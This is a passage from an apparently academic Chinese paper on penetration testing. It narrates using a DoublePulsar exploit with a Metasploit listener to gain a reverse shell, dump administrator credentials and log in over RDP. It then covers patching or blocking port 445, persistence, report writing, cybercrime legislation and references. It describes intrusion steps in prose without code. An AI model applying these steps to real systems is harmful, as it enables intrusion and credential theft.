39、oit設(shè)置監(jiān)聽(tīng)，通過(guò)DoublePulsar將惡意文件傳送到目標(biāo)機(jī)上，執(zhí)行成功，kali上收到一個(gè)反彈的會(huì)話(huà)。圖57 收到反彈會(huì)話(huà)上傳抓取管理員賬號(hào)密碼，通過(guò)3389遠(yuǎn)程連接登錄認(rèn)證服務(wù)器。圖58 成功拿到權(quán)限針對(duì)此漏洞修復(fù)方法，最完美的是及時(shí)下載微軟補(bǔ)丁，防止安全問(wèn)題。另一方法是在防火墻入棧和出棧規(guī)則禁止445端口，這樣完全隔離端口也會(huì)起到作用。后滲透階段后滲透階段是體現(xiàn)高手和入門(mén)新手的區(qū)別，后滲透階段分為，權(quán)限維持和擴(kuò)大戰(zhàn)果，權(quán)限維持是很重的，在持續(xù)對(duì)客戶(hù)應(yīng)用系統(tǒng)滲透過(guò)程，后面想要挖掘出漏洞需要從業(yè)務(wù)上找問(wèn)題，如果權(quán)限維持不到想進(jìn)一步發(fā)掘漏洞，擴(kuò)大戰(zhàn)果就會(huì)變得很難，或者從頭開(kāi)始，這樣就浪費(fèi)

40、大量時(shí)間和經(jīng)歷。滲透測(cè)試報(bào)告的撰寫(xiě)要求 滲透測(cè)試在最后階段一定要出一份滲透測(cè)試報(bào)告，這才算整個(gè)滲透的完成。滲透測(cè)試最主要的目的就是發(fā)現(xiàn)問(wèn)題，要全面的站在入侵者的立場(chǎng)，動(dòng)用一切辦法發(fā)現(xiàn)客戶(hù)的問(wèn)題，并且提出修補(bǔ)方法，避免客戶(hù)的損失。當(dāng)然，滲透測(cè)試報(bào)告作為自己幫助客戶(hù)的依據(jù)，和客戶(hù)溝通的文件，更是不可缺少的。滲透測(cè)試報(bào)告是一次滲透測(cè)試的主要價(jià)值體現(xiàn)：第一點(diǎn)，要必須寫(xiě)入滲透測(cè)試概述及最終目的，然后寫(xiě)入滲透測(cè)試項(xiàng)目的起因，如果沒(méi)有起因也可以介紹滲透測(cè)試意義。第二點(diǎn)，一定要精準(zhǔn)的說(shuō)明日期以及要執(zhí)行滲透測(cè)試的人員名單，也要列出的滲透測(cè)試過(guò)程中需要使用的工具。第三點(diǎn)，明確滲透測(cè)試的入侵的對(duì)象以及場(chǎng)所，可以根據(jù)

41、不同的滲透測(cè)試對(duì)象進(jìn)行總結(jié)。第四點(diǎn)，明確滲透的使用方法，從最開(kāi)始的收集信息到最后的結(jié)果生成報(bào)告。第五點(diǎn)，對(duì)測(cè)試結(jié)果發(fā)現(xiàn)的安全風(fēng)險(xiǎn)綜述及存在的風(fēng)險(xiǎn)加固建議。5總結(jié)目前，互聯(lián)網(wǎng)技術(shù)的發(fā)展速度已經(jīng)遠(yuǎn)遠(yuǎn)超越了網(wǎng)絡(luò)犯罪的立法速度，有一些立法對(duì)互聯(lián)網(wǎng)犯罪的處罰力度非常輕，還有一些互聯(lián)網(wǎng)犯罪活動(dòng)并沒(méi)有相關(guān)的法律規(guī)定。這種情況對(duì)于加大網(wǎng)絡(luò)信息安全的打擊力度是非常不利的。因此，現(xiàn)在要加快對(duì)互聯(lián)網(wǎng)犯罪的立法工作，使得在處理互聯(lián)網(wǎng)犯罪的時(shí)候可以做到有法可依。近些年，國(guó)家加大了最互聯(lián)網(wǎng)的監(jiān)督和監(jiān)管力度，使得很多的互聯(lián)網(wǎng)犯罪活動(dòng)能夠在較短的時(shí)間內(nèi)得到取證和解決，但是相對(duì)而言，公民的互聯(lián)網(wǎng)安全意思還是比較淡薄，因此，提高

42、公民的互聯(lián)網(wǎng)安全意識(shí)也成了迫在眉睫需要解決的問(wèn)題。重點(diǎn)加強(qiáng)對(duì)全社會(huì)信息安全問(wèn)題的統(tǒng)籌安排，對(duì)信息安全工作責(zé)任制要不斷深化細(xì)化；加強(qiáng)重點(diǎn)信息領(lǐng)域的安全保障工作，推動(dòng)信息安全等工作的開(kāi)展、要把安全測(cè)評(píng)、應(yīng)急管理等信息安全基本制度落到實(shí)處；加快推進(jìn)網(wǎng)絡(luò)與信息安全應(yīng)急基礎(chǔ)平臺(tái)建設(shè)；提升信息安全綜合監(jiān)管和服務(wù)水平，積極應(yīng)對(duì)信息安全新情況、新問(wèn)題，針對(duì)云計(jì)算、物聯(lián)網(wǎng)、移動(dòng)互聯(lián)網(wǎng)、下一代互聯(lián)網(wǎng)等新技術(shù)、新應(yīng)用開(kāi)展專(zhuān)項(xiàng)研究，建立信息安全風(fēng)險(xiǎn)評(píng)估和應(yīng)對(duì)機(jī)制；建立統(tǒng)一的網(wǎng)絡(luò)信任體系、信息安全測(cè)評(píng)認(rèn)證平臺(tái)、電子政務(wù)災(zāi)難備份中心等基礎(chǔ)設(shè)施等，力求對(duì)信息安全保障工作形成更強(qiáng)的基礎(chǔ)支撐。參考文獻(xiàn)1 魏倩倩.計(jì)算機(jī)網(wǎng)絡(luò)信息問(wèn)題分析.電子測(cè)試2014年11期:P67P692 朱斌 符剛.移動(dòng)互聯(lián)網(wǎng)發(fā)展探討.北京:朱斌 符剛,20123 楊忱.美國(guó)信息霸權(quán)及其對(duì)我國(guó)的影響.廣西:楊忱,20154 吳松澤.基于Web安全的滲透測(cè)試技術(shù)研究.哈爾濱:吳松澤,20155 李麗萍.云南經(jīng)濟(jì)管理職業(yè)學(xué)院校園信息管理系統(tǒng)設(shè)計(jì)與實(shí)現(xiàn).云南:李麗萍,20116 趙飛.基于Web的多用戶(hù)個(gè)人主頁(yè)管理系統(tǒng)設(shè)計(jì).西安:趙飛，20137 何山.論如何構(gòu)建一個(gè)輕量型嵌入式Web服務(wù)程序.電腦編程技巧與維護(hù).2013年10期:P69P728 封相遠(yuǎn).基于Linux操作系統(tǒng)的Web服務(wù)器的設(shè)計(jì)與實(shí)現(xiàn).天津:封相遠(yuǎn),20079